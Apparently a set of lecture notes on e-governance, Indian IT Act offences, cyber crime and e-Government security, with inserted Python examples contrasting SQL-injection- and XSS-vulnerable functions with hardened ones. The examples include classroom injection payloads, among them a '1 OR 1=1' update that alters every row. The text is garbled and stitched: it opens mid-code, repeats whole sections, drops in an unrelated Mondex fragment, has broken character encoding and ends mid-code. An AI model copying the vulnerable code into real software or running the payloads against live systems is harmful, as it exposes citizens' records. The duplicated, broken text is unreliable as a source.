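    conn.executemany("INSERT INTO citizens (name, tax_id) VALUES (?, ?)", SAMPLE_ROWS)
    conn.commit()
    return conn


# ---- SQL injection: vulnerable form beside the hardened form ----------------

def lookup_vulnerable(conn, name: str) -> list:
    """Untrusted input is spliced into the query text, so the caller can
    rewrite the WHERE clause: name = "x' OR '1'='1" returns every row."""
    sql = f"SELECT name, tax_id FROM citizens WHERE name = '{name}'"
    return conn.execute(sql).fetchall()


def lookup_hardened(conn, name: str) -> list:
    """Parameter binding: the driver sends the value separately from the SQL
    text, so it is compared as data and never parsed as SQL."""
    return conn.execute(
        "SELECT name, tax_id FROM citizens WHERE name = ?", (name,)
    ).fetchall()


def update_tax_id_vulnerable(conn, citizen_id: str, new_tax_id: str) -> int:
    """The id is interpolated unquoted, so citizen_id = "1 OR 1=1" makes the
    UPDATE hit every row: the data-integrity compromise. Returns rows changed."""
    sql = f"UPDATE citizens SET tax_id = '{new_tax_id}' WHERE id = {citizen_id}"
    cur = conn.execute(sql)
    conn.commit()
    return cur.rowcount


def update_tax_id_hardened(conn, citizen_id: str, new_tax_id: str) -> int:
    """Validate the type first (int() rejects "1 OR 1=1" with ValueError),
    then bind both values as parameters."""
    cid = int(citizen_id)
    cur = conn.execute(
        "UPDATE citizens SET tax_id = ? WHERE id = ?", (new_tax_id, cid)
    )
    conn.commit()
    return cur.rowcount


# ---- Cross-site scripting: vulnerable form beside the hardened form --------

def greeting_vulnerable(display_name: str) -> str:
    """Reflects user input into an HTML text node without escaping, so a
    name like "<script>...</script>" runs in every viewer's browser."""
    return f"<p>Welcome, {display_name}</p>"


def greeting_hardened(display_name: str) -> str:
    """Escape for the HTML text context before interpolating; markup in the
    input is rendered as literal text."""
    return f"<p>Welcome, {html.escape(display_name, quote=True)}</p>"


if __name__ == "__main__":
    db = make_db()
    evil_name = "x' OR '1'='1"
    print("vulnerable lookup leaks:", lookup_vulnerable(db, evil_name))
    print("hardened lookup returns:", lookup_hardened(db, evil_name))
    print("vulnerable update changed rows:",
          update_tax_id_vulnerable(db, "1 OR 1=1", "TX-EVIL"))
    print("vulnerable greeting:", greeting_vulnerable("<script>alert(1)</script>"))
    print("hardened greeting:  ", greeting_hardened("<script>alert(1)</script>"))
```

Parameter binding works because the database driver transmits the SQL text and the values separately, so a value can never change the statement's structure; escaping for XSS must match the output context (here an HTML text node), and an attribute, URL or JavaScript context each needs its own encoding.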

Specific security measures like firewalls, intrusion detection software, encryption and secure networks must be defined, designed and implemented for government agencies to provide the appropriate levels of security. But information security must also take into consideration the people and processes that rely on the systems. Employees with daily access to e-Government systems must be trained in cybersecurity, and this aspect must become part of their job. A study by the Department of Computer Science at Columbia University shows how the human factor influences cybersecurity policies and how that work could be used to train government employees to improve the security posture of government departments and agencies.

CYBER CRIME AND LAWS

The expression 'Crime' is defined as an act which subjects the doer to legal punishment, or any offence against morality or social order, or any unjust or shameful act. "Offence" is defined in the Code of Criminal Procedure to mean an act or omission made punishable by any law for the time being in force.

Cyber Crime is emerging as a serious threat. Worldwide, governments, police departments and intelligence units have started to react.

Cyber Crime is a term used to broadly describe criminal activity in which computers or computer networks are a tool, a target or a place of criminal activity, and it includes everything from electronic cracking to denial of service attacks. It is also used to include traditional crimes in which computers or networks are used to enable the illicit activity.

Computer crime mainly consists of unauthorized access to computer systems, data alteration, data destruction and theft of intellectual property. Cyber crime in the context of national security may involve hacking, traditional espionage or information warfare and related activities.

Pornography, threatening email, assuming someone's identity, sexual harassment, defamation, spam and phishing are some examples where computers are used to commit crime, whereas viruses, worms, industrial espionage, software piracy and hacking are examples where computers become the target of crime.

Cyber Crime Variants

Hacking
Hacking is a crime which entails cracking systems and gaining unauthorized access to the data stored in them. Hacking witnessed a 37 per cent increase this year.

Cyber Squatting
Cyber Squatting is the act of registering a famous domain name and then selling it for a fortune. This is an issue that has not been tackled in the IT Act 2000.

Phishing
Phishing is just one of the many frauds on the Internet trying to fool people into parting with their money. Phishing refers to the receipt of unsolicited emails by customers of financial institutions, requesting them to enter their username, password or other personal information to access their account for some reason. The fraudster then has access to the customer's online bank account and to the funds contained in that account.

Cyber Stalking
Cyber Stalking is the use of the Internet or other electronic means to stalk someone. This term is used interchangeably with online harassment and online abuse. Stalking generally involves harassing or threatening behaviour that an individual engages in repeatedly, such as following a person, appearing at a person's home or place of business, making harassing phone calls, leaving written messages or objects, or vandalizing a person's property.

Vishing
Vishing is the criminal practice of using social engineering and Voice over IP (VoIP) to gain access to private personal and financial information from the public for the purpose of financial reward. The term is a combination of "voice" and "phishing". Vishing exploits the public's trust in landline telephone services. Vishing is typically used to steal credit card numbers or other information used in identity theft schemes from individuals.

A rapidly growing online user base
• 121 million Internet users
• 65 million active Internet users, up by 28% from 51 million in 2010
• 50 million users shop online on e-commerce and online shopping sites
• 46+ million social network users
• 346 million mobile users had subscribed to data packages

CYBER LAW

Hacking (the original Section 66 definition):
(1) Whoever, with the intent to cause, or knowing that he is likely to cause, wrongful loss or damage to the public or any person, destroys or deletes or alters any information residing in a computer resource, or diminishes its value or utility, or affects it injuriously by any means, commits hacking.
(2) Whoever commits hacking shall be punished with imprisonment up to three years, or with fine which may extend up to two lakh rupees, or with both.

Section 43:
Whoever, without permission of the owner of the computer,
• secures access;
• downloads, copies or extracts any data, computer database or any information;
• introduces or causes to be introduced any virus or contaminant;
• disrupts or causes disruption;
• denies or causes denial of access to any person;
• provides any assistance to any person to facilitate access;
• charges the services availed of by a person to the account of another person by tampering with or manipulating any computer, computer system or computer network;
• destroys, deletes or alters any information residing in a computer resource, or diminishes its value or utility, or affects it injuriously by any means;
• steals, conceals, destroys or alters, or causes any person to steal, conceal, destroy or alter, any computer source code used for a computer resource with an intention to cause damage;
shall be liable to pay damages by way of compensation not exceeding one crore rupees to the person so affected.

"If any person, dishonestly or fraudulently, does any act referred to in section 43, he shall be punishable with imprisonment for a term which may extend to three years or with fine which may extend to five lakh rupees or with both." [S66]

S 66A – Punishment for sending offensive messages through communication service, etc.
Any person who sends, by means of a computer resource or a communication device,
(a) any information that is grossly offensive or has menacing character; or
(b) any information which he knows to be false, but for the purpose of causing annoyance, inconvenience, danger, obstruction, insult, injury, criminal intimidation, enmity, hatred or ill will, persistently makes by making use of such computer resource or a communication device; or
(c) any electronic mail or electronic mail message for the purpose of causing annoyance or inconvenience, or to deceive or to mislead the addressee or recipient about the origin of such messages,
shall be punishable with imprisonment for a term which may extend to three years and with fine.

S 66C – Punishment for identity theft
"Whoever, fraudulently or dishonestly, makes use of the electronic signature, password or any other unique identification feature of any other person, shall be punished with imprisonment of either description for a term which may extend to three years and shall also be liable to fine which may extend to rupees one lakh."

S 66D – Punishment for cheating by personation by using computer resource
"Whoever, by means of any communication device or computer resource, cheats by personation, shall be punished with imprisonment of either description for a term which may extend to three years and shall also be liable to fine which may extend to one lakh rupees."

S 66E – Punishment for violation of privacy
"Whoever, intentionally or knowingly, captures, publishes or transmits the image of a private area of any person without his or her consent, under circumstances violating the privacy of that person, shall be punished with imprisonment which may extend to three years or with fine not exceeding two lakh rupees, or with both."

S 67A – Punishment for publishing or transmitting material containing sexually explicit act, etc., in electronic form
"Whoever publishes or transmits or causes to be published or transmitted in the electronic form any material which contains sexually explicit act or conduct shall be punished on first conviction with imprisonment of either description for a term which may extend to five years and with fine which may extend to ten lakh rupees."

S 67C – Preservation and retention of information by intermediaries
"(1) Intermediary shall preserve and retain such information as may be specified for such duration and in such manner and format as the Central Government may prescribe.
(2) Any intermediary who intentionally or knowingly contravenes the provisions of sub-section (1) shall be punished with an imprisonment for a term which may extend to three years and shall also be liable to fine."

IT ACT

The Information Technology Act, 2000 (also known as ITA-2000 or the IT Act) is an Act of the Indian Parliament (No. 21 of 2000) notified on October 17, 2000. This Act is being opposed by the Save Your Voice campaign and other civil society organizations in India. The user-review and consumer social networking site MouthShut.com has filed a writ petition in the Supreme Court of India to repeal and nullify parts of the IT Act 2000.

The United Nations General Assembly, by resolution A/RES/51/162 dated 30 January 1997, adopted the Model Law on Electronic Commerce adopted by the United Nations Commission on International Trade Law. This is referred to as the UNCITRAL Model Law on E-Commerce. Following the UN resolution, India passed the Information Technology Act 2000 in May 2000, which came into force on October 17, 2000. The Information Technology Act 2000 has been substantially amended through the Information Technology (Amendment) Act 2008, which was passed by the two houses of the Indian Parliament on December 23 and 24, 2008. It received Presidential assent on February 5, 2009 and came into force on October 27, 2009. The amended Act has provided additional focus on information security. It has added several new sections on offences, including cyber terrorism and data protection. A set of Rules relating to sensitive personal information and reasonable security practices (mentioned in section 43A of the ITAA 2008) was notified in April 2011.

Provisions –

The Information Technology Act 2000 consisted of 94 sections segregated into 13 chapters. Four schedules form part of the Act. In the 2008 version of the Act there are 124 sections (excluding 5 sections that have been omitted from the earlier version) and 14 chapters. Schedules I and II have been replaced; Schedules III and IV are deleted.

The Information Technology Act 2000 addressed the following issues:
1. Legal recognition of electronic documents
2. Legal recognition of digital signatures
3. Offences and contraventions
4. Justice dispensation systems for cybercrimes

Offences –

Section | Offence | Punishment
65 | Tampering with computer source documents: intentional concealment, destruction or alteration of source code when the computer source code is required to be kept or maintained by law for the time being in force | Imprisonment up to three years, or/and with fine up to 2 lakh rupees
66 | Hacking | Imprisonment up to three years, or/and with fine up to 5 lakh rupees
66-A | Sending offensive message through electronic means: sending any information through an electronic message that is grossly offensive or has menacing character and might cause insult, injury, criminal intimidation, enmity, hatred or ill will, etc., or sending such mail intended to deceive or to mislead the addressee or recipient about the origin of such messages | Imprisonment up to three years and with fine

Criticisms –

The 2008 Amendment Act was passed in an eventful Parliamentary session on 23 December 2008 with no discussion in the House. Some cyber law observers have criticized the amendments on the ground of a lack of legal and procedural safeguards to prevent violation of the civil liberties of Indians. There has also been appreciation of the amendments from many observers, because they address the issue of cyber security.

Section 69 empowers the Central Government or State Government, or its authorized agency, to intercept, monitor or decrypt any information generated, transmitted, received or stored in any computer resource if it is necessary or expedient so to do in the interest of the sovereignty or integrity of India, defence of India, security of the State, friendly relations with foreign States or public order, or for preventing incitement to the commission of any cognizable offence, or for investigation of any offence. They can also secure assistance from computer personnel in decrypting data (see mandatory decryption), under penalty of imprisonment.

Section 66A is widely criticized. It has led to numerous abuses reported by the press. Section 66A has also been criticised and challenged in the Lucknow and Madras High Courts for its constitutional validity. Based on Section 66A, the Bombay High Court has held that creating a website and storing false information on it can entail cyber crime. (Section 66A was subsequently struck down as unconstitutional by the Supreme Court of India in Shreya Singhal v. Union of India, 2015, so the Section 66A provisions quoted above are no longer in force.)

significant data may be lost before Mondex is able to retrieve it. Critics say this loss of data is a critical design flaw, making it difficult for Mondex to reliably detect fraud.

While Mondex smart cards are not a hundred percent secure, they do possess the ability to tolerate minor fraud loss.

Mondex believes their electronic payment system is secure. They are convinced that critics who have voiced concern over security issues are mistaken and misinformed. Perhaps the use of a Mondex smart card depends on a personal level of trust.

E-GOVERNANCE

Although the term 'e-Governance' has gained currency in recent years, there is no standard definition of this term. Different governments and organizations define the term to suit their own aims and objectives. Sometimes the term 'e-government' is also used instead of 'e-Governance'.

Several dimensions and factors influence the definition of e-governance, or electronic governance. The word "electronic" in the term e-governance implies technology-driven governance. E-governance is the application of information and communication technology (ICT) for delivering government services, exchange of information, communication transactions, and integration of various stand-alone systems and services between government-to-customer (G2C), government-to-business (G2B) and government-to-government (G2G), as well as back office processes and interactions within the entire government framework. Through e-governance, government services will be made available to citizens in a convenient, efficient and transparent manner. The three main target groups that can be distinguished in governance concepts are government, citizens and businesses/interest groups. In e-governance there are no distinct boundaries.

Generally, four basic models are available – government-to-citizen (customer), government-to-employees, government-to-government and government-to-business.

Difference between E-Government and E-Governance –

Both terms are often treated as the same; however, there is some difference between the two. E-government is the use of ICTs in public administration, combined with organizational change and new skills, to improve public services and democratic processes and to strengthen support to the public. The problem with this definition, if it is to be congruent with a definition of e-governance, is that there is no provision for the governance of ICTs. As a matter of fact, the governance of ICTs most probably requires a substantial increase in regulation and policy-making capabilities, with all the expertise and opinion-shaping processes among the various social stakeholders of these concerns. So the perspective of e-governance is the use of technologies that both help governing and have to be governed. Public-Private Partnership (PPP) based e-governance projects are hugely successful in India. United Telecoms Limited, known as UTL, is a major player in India in PPP-based e-governance projects. Each project had mammoth state-wide area networks in these states.

E-governance is the future many countries are looking forward to for a corruption-free government. E-government is a one-way communication protocol, whereas e-governance is a two-way communication protocol. The essence of e-governance is to reach the beneficiary and ensure that the services intended to reach the desired individual have been delivered. There should be an auto-response to support the essence of e-governance, whereby the Government realizes the efficacy of its governance. E-governance is by the governed, for the governed and of the governed.

Establishing the identity of the end beneficiary is a challenge in all citizen-centric services. Statistical information published by governments and world bodies does not always reveal the facts. The best form of e-governance cuts down on the unwanted interference of too many layers while delivering governmental services. It depends on a good infrastructural setup, with the support of local processes and parameters, for governments to reach their citizens or end beneficiaries. Budgets for planning, development and growth can be derived from well laid out e-governance systems.

Why e-Governance?

E-Government can transform citizen service, provide access to information to empower citizens, enable their participation in government and enhance citizens' economic and social opportunities, so that they can make better lives for themselves and for the next generation.

BASIC ARCHITECTURE

A suggested architecture for e-Governance is shown in the diagram, where it is illustrated that applications from various departments can be integrated together so as to be accessed by any terminal or computer from any other department, or from anywhere through the network. This is because of the characteristics of CORBA: it is location transparent, language independent, implementation independent and operating system independent. The applications connected through CORBA/IIOP could be legacy applications wrapped to suit the CORBA specifications, any new Web application, or even a database environment using Oracle etc. Seamless interconnection, and thereby effective utility of the entire system of e-Governance, is possible if the middleware is designed to have the necessary services, like Transactions, Data Base Management, Messaging and Naming.

Regarding security aspects, the CORBA Security standard is built around existing security specifications such as the Distributed Computing Environment (DCE), the Kerberos protocol and the Generic Security Service (GSS) API. While these technologies are heavily weighted toward shared-secret (symmetric) key mechanisms, public key security with Secure Sockets Layer (SSL) is popular with Internet-based transactions. (SSL itself is now deprecated; its successor, TLS, is what current deployments should use.)

Types of Interactions in e-Governance

e-Governance facilitates interaction between different stakeholders in governance. These interactions may be described as follows.

G2G (Government to Government)
In this case, Information and Communications Technology is used not only to restructure the governmental processes involved in the functioning of government entities but also to increase the flow of information and services within and between different entities. This kind of interaction is only within the sphere of government and can be both horizontal, i.e. between different government agencies as well as between different functional areas within an organization, or vertical, i.e. between national, provincial and local government agencies as well as between different levels within an organization. The primary objective is to increase efficiency, performance and output.

G2C (Government to Citizens)
In this case, an interface is created between the government and citizens which enables the citizens to benefit from efficient delivery of a large range of public services. This expands the availability and accessibility of public services on the one hand and improves the quality of services on the other. It gives citizens the choice of when to interact with the government (e.g. 24 hours a day, 7 days a week), from where to interact with the government (e.g. a service centre, an unattended kiosk or one's home/workplace) and how to interact with the government (e.g. through internet, fax, telephone, email, face-to-face, etc.). The primary purpose is to make government citizen-friendly.

G2B (Government to Business)
Here, e-Governance tools are used to aid the business community – providers of goods and services – to interact seamlessly with the government. The objective is to cut red tape, save time, reduce operational costs and create a more transparent business environment when dealing with the government. The G2B initiatives can be transactional, such as in licensing, permits, procurement and revenue collection. They can also be promotional and facilitative, such as in trade, tourism and investment. These measures help to provide a congenial environment for businesses, enabling them to perform more efficiently.

G2E (Government to Employees)
Government is by far the biggest employer and, like any organization, it has to interact with its employees on a regular basis. This interaction is a two-way process between the organization and the employee. Use of ICT tools helps in making these interactions fast and efficient on the one hand, and increases the satisfaction levels of employees on the other.

Difference between G2B and B2G

Government to business (G2B)- Refers to the conducting of transactions between

government bodies and business via internet

Business to government (B2G)- Professional affairs conducted between companies and

regional municipal or federal governing bodies B2G typically encompasses the

determination and evaluation of proposal and completion of contract

PUBLIC PRIVATE PARTNERSHIPS

bull Agreement between Government and the Private Sector for the Provision of a Public

Good or Service by the Latter

bull Generally but not always involving

ndash Long Term Contracts

ndash User Charges andor Payments flowing between the Parties

ndash Shared Investments but Mainly Private

PREPARED BY ARUN PRATAP SINGH 46

46

ndash Risk Sharing by the Parties

bull Must be a Partnership

A public-private partnership exists when public sector agencies (federal state or local) join with

private sector entities (companies foundations academic institutions or citizens) and enter into a

business relationship to attain a commonly shared goal that also achieves objectives of the

individual partners

Why do them

bull Fiscal Head Room

bull As a Way of Financing the Project

bull Separate Policy amp Regulation from Operations

PREPARED BY ARUN PRATAP SINGH 47

47

bull Make the Good or Service Available

bull Pay for Performance and Output

bull Introduce Competition ndash For and In the Market

PREPARED BY ARUN PRATAP SINGH 48

48

The Need to Set the Right Priorities ndash

Four Basic Dimensions of P3

Although each is unique all P3rsquos include four basic characteristics

Shared goals

Shared resources (time money expertise people)

Shared risks

Shared benefits

Benefits

Expedited project completion

Project cost savings

Improved quality

Use of private resources

Access to new sources of private capital

Two Major Steps

• Crafting the partnership
• Implementing the partnership

Project Management: Six Distinct Phases

1 Genesis
  - What is the need?
  - What is driving the need (rationale)? Facility non-compliance, natural disaster, budget deficit.
  - Is there a need for a Public/Private Partnership?

2 Preliminary Project Definition
  - Feasibility: is a Public/Private Partnership feasible, not only financially but practically? Can it be done?
  - Market research
  - Economic/financial analysis
  - Program, budget and schedule
  - Risk analysis

3 Plan and Test
  - Final project definition: what is the best way to complete the project?
  - Has the plan been thoroughly tested to assess market demand, public and stakeholder feedback, and economics?
  - Master schedule/budget
  - Political climate: any potential "fatal flaws" that could derail the project?

4 Procurement and Contracting
  - How do you choose and contract with the best-value private partner?
  - What is the best delivery method? Design-Bid-Build, Design-Build, Finance-Design-Build
  - What do current statutes allow?
  - Procurement approach: sole source, RFP, low bid
  - Risk allocation between public and private partners
  - Structuring of contract: risks and rewards

5 Implement
  - Environmental
  - Design
  - Permitting
  - Construction
  - Commissioning and administration

6 Operate
  - Startup
  - Monitoring
  - Assessment
  - Enhancement
  - Contract modifications
  - Contract renegotiations

READINESS IN E-GOVERNANCE

A high level of readiness to develop and implement e-government services is a prerequisite for a high-performing and innovative public sector that delivers integrated services, making life easier for citizens and businesses. E-government readiness is therefore a significant indicator of whether a country is prepared to harvest efficiencies gained from ICT-enabled public administrations.

The UN's e-government readiness index is a combined indicator of the supply of, potential demand for, and maturity of e-government services. OECD member countries exhibit a high capacity to develop and implement e-government services. This is generally characterized by an extensive broadband infrastructure, a repository of electronic information on government laws and policies (including links to archived information and downloadable forms), and a high level of comfort with ICT by citizens and businesses. Countries with the highest readiness index tend to also have a large amount of transactional and e-commerce features on their government websites. As noted by the UN in its 2008 e-government survey, the Scandinavian countries, with the top three scores on the readiness index, all generally share similar e-government environments (e.g. the accessibility and penetration of the electronic infrastructure) and strategies (e.g. the online provision of services). Each country has two main government websites: one that is informative and another that is a gateway for e-government services. In addition, citizens and businesses are able to access many services and complete many transactions online. However, similar levels of e-government readiness can also result from different strategic approaches.

Internet access is a prerequisite for citizens and businesses to use e-government services and thus a leading indicator of countries' readiness to harness the potential efficiencies of ICT. Broadband penetration has increased dramatically in most OECD member countries in the past five years as countries have made significant investments in their telecommunications infrastructure.

SECURITY ISSUES IN E-GOVERNANCE

1 INTRODUCTION

The term e-Government is defined by the Organization for Economic Cooperation and Development (OECD) as the use of new information and communication technologies (ICTs) by governments as applied to the full range of government functions. In particular, the networking potential offered by the Internet and related technologies has the potential to transform the structures and operation of government.

The effective management of information security is a key factor, as the willingness of the different users (citizens and other parties) to use e-Government services will heavily depend on the trust they have in the data security of these services.

2 INFORMATION SECURITY

A central challenge of e-Government services is how the new technology can be used not only to increase efficiency for public administration but also to strengthen confidence in privacy measures by creating mutual transparency between public administration and citizens.

The process approach for an information security management system (ISMS) encourages its users to emphasize the importance of:

• understanding an organization's information security requirements and the need to establish policy and objectives for information security;
• implementing and operating controls to manage an organization's information security risks in the context of the organization's overall business risks;
• monitoring and reviewing the performance and effectiveness of the ISMS, with continual improvement based on objective measurement.

Data security requires a set of security requirements:

• Authentication: the capability to identify who is using the services (a person or a software program); the process of verifying that you are who you say you are.
• Authorization: the capability to grant rights of access to resources; the process of verifying that someone has the rights to do what she is trying to do.
• Confidentiality: the capability to prevent unauthorized access to information.
• Integrity: the capability to prevent unauthorized modification of information, ensuring that information can be relied upon and is accurate and complete.
• Traceability: the capability to chronologically interrelate any transaction to the person or system that performed the action, in a way that is verifiable.
• Non-repudiation: the capability to prevent a person or system that took part in an event or action from denying or challenging their participation in the event.
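The requirements above map onto concrete controls in a service. The following Python code is an added example, not part of these notes: it implements authentication with salted PBKDF2 password hashing, role-based authorization, and an HMAC-chained audit log that gives integrity and traceability for every attempted action, whether it succeeded or not. The user names, passwords, roles and server key are constructed placeholders. Confidentiality (encryption in transit and at rest) and non-repudiation (which needs asymmetric signatures rather than a MAC key shared with the server) are not covered by this snippet.

```python
import hashlib
import hmac
import json
import os
import time

# Constructed example values: a real server-side MAC key would live in a
# KMS or HSM, never in source code.
SERVER_KEY = b"constructed-example-key-replace-in-production"
PBKDF2_ROUNDS = 100_000

# Authorization policy (constructed): which actions each role may perform.
PERMISSIONS = {
    "clerk": {"read_record"},
    "officer": {"read_record", "update_record"},
}


def hash_password(password: str, salt: bytes) -> bytes:
    """Salted PBKDF2-HMAC-SHA256: only the digest is stored, never the password."""
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ROUNDS)


class AuditLog:
    """Append-only trail for traceability and integrity. Each entry's HMAC covers
    its own fields plus the previous entry's tag, so editing, deleting or
    reordering an earlier entry invalidates every tag after it."""

    def __init__(self, key: bytes):
        self.key = key
        self.entries = []

    def _tag(self, fields: dict, prev_tag: str) -> str:
        payload = json.dumps(fields, sort_keys=True).encode() + prev_tag.encode()
        return hmac.new(self.key, payload, hashlib.sha256).hexdigest()

    def append(self, actor: str, action: str, outcome: str) -> None:
        prev_tag = self.entries[-1]["tag"] if self.entries else ""
        fields = {"seq": len(self.entries), "ts": time.time(),
                  "actor": actor, "action": action, "outcome": outcome}
        self.entries.append({**fields, "tag": self._tag(fields, prev_tag)})

    def verify(self) -> bool:
        """Recompute the chain from the start; False as soon as a tag mismatches."""
        prev_tag = ""
        for entry in self.entries:
            fields = {k: v for k, v in entry.items() if k != "tag"}
            if not hmac.compare_digest(self._tag(fields, prev_tag), entry["tag"]):
                return False
            prev_tag = entry["tag"]
        return True


class RecordService:
    """Every attempted action is authenticated, authorized and then audited."""

    def __init__(self, audit: AuditLog):
        self.audit = audit
        self.users = {}

    def add_user(self, name: str, password: str, role: str) -> None:
        salt = os.urandom(16)
        self.users[name] = {"salt": salt, "digest": hash_password(password, salt), "role": role}

    def authenticate(self, name: str, password: str) -> bool:
        user = self.users.get(name)
        if user is None:
            hash_password(password, b"\x00" * 16)  # same cost whether or not the account exists
            return False
        return hmac.compare_digest(hash_password(password, user["salt"]), user["digest"])

    def authorize(self, name: str, action: str) -> bool:
        return action in PERMISSIONS.get(self.users[name]["role"], set())

    def perform(self, name: str, password: str, action: str) -> str:
        if not self.authenticate(name, password):
            outcome = "auth_failed"
        elif not self.authorize(name, action):
            outcome = "denied"
        else:
            outcome = "ok"  # the real record operation would happen here
        self.audit.append(name, action, outcome)  # failures are traceable too
        return outcome


def demo() -> dict:
    """Walk through the controls and return the outcomes plus the verify()
    results before and after a simulated rewrite of the first log entry."""
    audit = AuditLog(SERVER_KEY)
    svc = RecordService(audit)
    svc.add_user("alice", "clerk-pass", "clerk")  # constructed credentials
    svc.add_user("bob", "officer-pass", "officer")
    outcomes = [
        svc.perform("alice", "clerk-pass", "read_record"),    # ok
        svc.perform("alice", "clerk-pass", "update_record"),  # denied: clerk role
        svc.perform("bob", "wrong-pass", "update_record"),    # auth_failed
        svc.perform("bob", "officer-pass", "update_record"),  # ok
    ]
    intact = audit.verify()
    audit.entries[0]["actor"] = "mallory"  # an insider rewrites history
    return {"outcomes": outcomes, "intact": intact, "after_tamper": audit.verify()}


if __name__ == "__main__":
    print(demo())
```

The chaining matters because a log whose entries are individually signed can still have entries silently deleted; including the previous tag in each HMAC means any deletion or reordering shows up at verification time.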

Examples of organizational and technical measures to prevent unauthorized access and processing are:

• protecting premises, equipment and systems software, including input-output units;
• protecting software applications used to process personal data;
• preventing unauthorized access to personal data during transmission, including transmission via telecommunication means and networks;
• ensuring effective methods of blocking, destruction, erasure or anonymization of personal data;
• enabling subsequent determination of when individual personal data were entered into a filing system, used or otherwise processed, and the person responsible, for the period covered by statutory protection of the rights of an individual with regard to unauthorized supply or processing of personal data.

Although trusted security and privacy measures constitute a crucial success factor for e-Government, this has not yet been addressed: as the UN 2012 Survey shows, only 20% of national portals clearly indicate the presence of security features. Europe is leading, with 44 countries displaying secure links on their national websites, but the survey does not consider regional and local websites, nor the many decentralized public organization web portals.

3 INFORMATION SECURITY THREATS

Services provided by e-Government to citizens, enterprises, public officers, government administration and agencies via Internet and mobile connections are vulnerable to a variety of threats. Detailed examples of cyber attacks use techniques like packet sniffers, probes, malware, internet infrastructure attacks, denial of service attacks, remote-to-local attacks and user-to-root attacks. The successful adoption of an ISMS is important to protect information assets, allowing an organization to:

• achieve greater assurance that its information assets are adequately protected against information security risks on a continual basis;
• maintain a structured and comprehensive framework for identifying and assessing information security risks, selecting and applying applicable controls, and measuring and improving their effectiveness;
• continually improve its control environment;
• effectively achieve legal and regulatory compliance.

There are simple and well-known web application vulnerabilities that could be avoided, but e-Government websites are still vulnerable. A research work found 816 e-Government web sites from 212 different countries were vulnerable to Cross Site Scripting (XSS) and Structured Query Language (SQL) injection. A SQL injection attack can compromise data integrity, while XSS is a vulnerability which attackers may exploit to steal users' information.
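Both vulnerabilities come down to mixing untrusted input with code: SQL text in one case, HTML in the other. The following Python example is added here and is not code from these notes or from any e-Government site; it shows a name lookup and a result page in their vulnerable form beside the hardened form, using an in-memory SQLite table with constructed rows. Parameter binding fixes the query and output escaping fixes the page.

```python
import html
import sqlite3


def make_db() -> sqlite3.Connection:
    """In-memory table with constructed sample rows standing in for citizen records."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE citizens (id INTEGER PRIMARY KEY, name TEXT, tax_id TEXT)")
    conn.executemany(
        "INSERT INTO citizens (name, tax_id) VALUES (?, ?)",
        [("Asha", "TAX-001"), ("Ravi", "TAX-002"), ("Meera", "TAX-003")],
    )
    conn.commit()
    return conn


def lookup_vulnerable(conn: sqlite3.Connection, name: str) -> list:
    """Vulnerable: the caller's string is spliced into the SQL text, so quote
    characters in it change the query's structure instead of being compared as data."""
    query = f"SELECT name, tax_id FROM citizens WHERE name = '{name}'"
    return conn.execute(query).fetchall()


def lookup_safe(conn: sqlite3.Connection, name: str) -> list:
    """Hardened: a bound parameter is always treated as a value, whatever it contains."""
    return conn.execute(
        "SELECT name, tax_id FROM citizens WHERE name = ?", (name,)
    ).fetchall()


def render_vulnerable(name: str) -> str:
    """Vulnerable: reflects the input into HTML unescaped (reflected XSS)."""
    return f"<p>Results for {name}</p>"


def render_safe(name: str) -> str:
    """Hardened: HTML-escape on output so the browser displays the text
    instead of parsing it as markup."""
    return f"<p>Results for {html.escape(name, quote=True)}</p>"


def compare(name: str) -> dict:
    """Run both variants on the same input so the difference is visible side by side."""
    conn = make_db()
    return {
        "vulnerable_rows": len(lookup_vulnerable(conn, name)),
        "safe_rows": len(lookup_safe(conn, name)),
        "vulnerable_html": render_vulnerable(name),
        "safe_html": render_safe(name),
    }


if __name__ == "__main__":
    print(compare("Asha"))         # both lookups return 1 row
    print(compare("' OR '1'='1"))  # vulnerable lookup returns all 3 rows, safe returns 0
    print(compare("<script>"))     # vulnerable page contains a tag, safe page shows &lt;script&gt;
```

The textbook `' OR '1'='1` input is the standard classroom illustration: against the vulnerable query it turns a lookup of one citizen into a dump of the table, while the bound parameter simply finds no citizen with that literal name.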

Specific security measures like firewalls, intrusion detection software, encryption and secure networks must be defined, designed and implemented for government agencies to provide the appropriate levels of security. But information security must also take into consideration the people and processes that rely on the systems. Employees with daily access to e-Government systems must be trained on cybersecurity, and this aspect must become part of their job. A study by the Department of Computer Science at Columbia University shows how the human factor influences cybersecurity policies and how that work could be used to train government employees to improve the security posture of government departments and agencies.

CYBER CRIME AND LAWS

The expression 'Crime' is defined as an act which subjects the doer to legal punishment, or any offence against morality, social order, or any unjust or shameful act. "Offence" is defined in the Code of Criminal Procedure to mean an act or omission made punishable by any law for the time being in force.

Cyber Crime is emerging as a serious threat. Worldwide, governments, police departments and intelligence units have started to react.

Cyber Crime is a term used to broadly describe criminal activity in which computers or computer networks are a tool, a target, or a place of criminal activity, and includes everything from electronic cracking to denial of service attacks. It is also used to include traditional crimes in which computers or networks are used to enable the illicit activity.

Computer crime mainly consists of unauthorized access to computer systems, data alteration, data destruction, and theft of intellectual property. Cyber crime in the context of national security may involve hacking, traditional espionage, or information warfare and related activities.

Pornography, threatening email, assuming someone's identity, sexual harassment, defamation, spam and phishing are some examples where computers are used to commit crime, whereas viruses, worms, industrial espionage, software piracy and hacking are examples where computers become the target of crime.

Cyber Crime Variants

Hacking

Hacking is a crime which entails cracking systems and gaining unauthorized access to the data stored in them. Hacking had witnessed a 37 per cent increase this year.

Cyber Squatting

Cyber Squatting is the act of registering a famous domain name and then selling it for a fortune. This is an issue that has not been tackled in the IT Act 2000.

Phishing

Phishing is just one of the many frauds on the Internet trying to fool people into parting with their money. Phishing refers to the receipt of unsolicited emails by customers of financial institutions requesting them to enter their username, password or other personal information to access their account for some reason. The fraudster then has access to the customer's online bank account and to the funds contained in that account.
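The traits described above (an unsolicited credential request, urgency, and a link that does not go where it claims) are exactly what a mail filter looks for. The following Python scorer is an added example, not from these notes: it runs over two constructed messages and reports each indicator it finds. The sender addresses, domains, IP address and keyword lists are assumptions for illustration, and the last-two-labels "registrable domain" helper is a simplification that a real filter would replace with a public-suffix list.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed keyword lists; a production filter would use far richer signals.
CREDENTIAL_WORDS = ("password", "username", "verify your account")
URGENCY_WORDS = ("immediately", "within 24 hours", "suspended")
IPV4 = re.compile(r"\d{1,3}(?:\.\d{1,3}){3}")


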